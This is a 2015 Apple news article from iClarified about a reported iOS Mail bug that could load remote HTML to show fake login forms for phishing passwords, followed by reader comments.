November 24, 2024
iOS Mail Bug Could Be Used to Phish Passwords From Users

iOS Mail Bug Could Be Used to Phish Passwords From Users

Posted June 10, 2015 at 4:02pm by iClarified
Jan Soucek has discovered a new bug in the iOS mail app that could load remote HTML code replacing the original content of the message.

Back in January 2015 I stumbled upon a bug in iOS's mail client, resulting in HTML tag in e-mail messages not being ignored. This bug allows remote HTML content to be loaded, replacing the content of the original e-mail message. JavaScript is disabled in this UIWebView, but it is still possible to build a functional password "collector" using simple HTML and CSS.

The bug could be used to create fake iCloud-like login forms that would capture passwords and more --right within the iOS Mail app. Soucek says he notified Apple of this bug back in January 2015, but the company never issued a fix -- so he published a proof of concept to put pressure on Apple to fix the bug.


While Soucek uses an iCloud-login form to demonstrate the bug, almost any website could be imitated, making it possible to steal credit cards, passwords, social security numbers, and more.

No word on which iOS versions are impacted by the bug, but please by wary of any pop login forms that appear with the iOS Mail App.

Read More




Add Comment
Would you like to be notified when someone replies or adds a new comment?
Yes (All Threads)
Yes (This Thread Only)
No
iClarified Icon
Notifications
Would you like to be notified when we post a new Apple news article or tutorial?
Yes
No
Comments (5)
You must login or register to add a comment...
Marcy Leavitt
Marcy Leavitt - June 11, 2015 at 6:38am
I get pop up mail logins frequently asking me to verify my yahoo login password. Should I worry? Changing my password is probably the best option now. I use iOS 8.3 and iPhone 6 plus.
gamerscul9870
gamerscul9870 - June 10, 2015 at 4:34pm
What they also need to fix is how I get multiple of the same messages from iClarified the more a new comment is added to the article. Gmail is the only reason I use this to confirm my comment.
James
James - June 10, 2015 at 4:32pm
I got this pop up last night on my Mac mini. It had my user name filled in and asked for my password for iCloud login and asked me to put it in 2 times. Not sure if it's the same thing? :/
AppleGuy299
AppleGuy299 - June 10, 2015 at 6:33pm
No it's an issue with OS X. 10.10 logging out and back in from System Preferences > iCloud.
stevenlacross
stevenlacross - June 10, 2015 at 4:10pm
They also need to fix the glitch where if a photo sits in your recently deleted album for more than 30 days, it doesn't get hidden and actually gets deleted instead. Like if you manually set the date back a couple months or more, you'll see photos reappear in the recently deleted album
Recent. Read the latest Apple News.
RECENT
Tutorials. Help is here.
TUTORIALS
Where to Download macOS Sequoia
Where to Download macOS Ventura
AppleTV Firmware Download Locations
Where To Download iPad Firmware Files From
Where To Download iPhone Firmware Files From
Deals. Save on Apple devices and accessories.
DEALS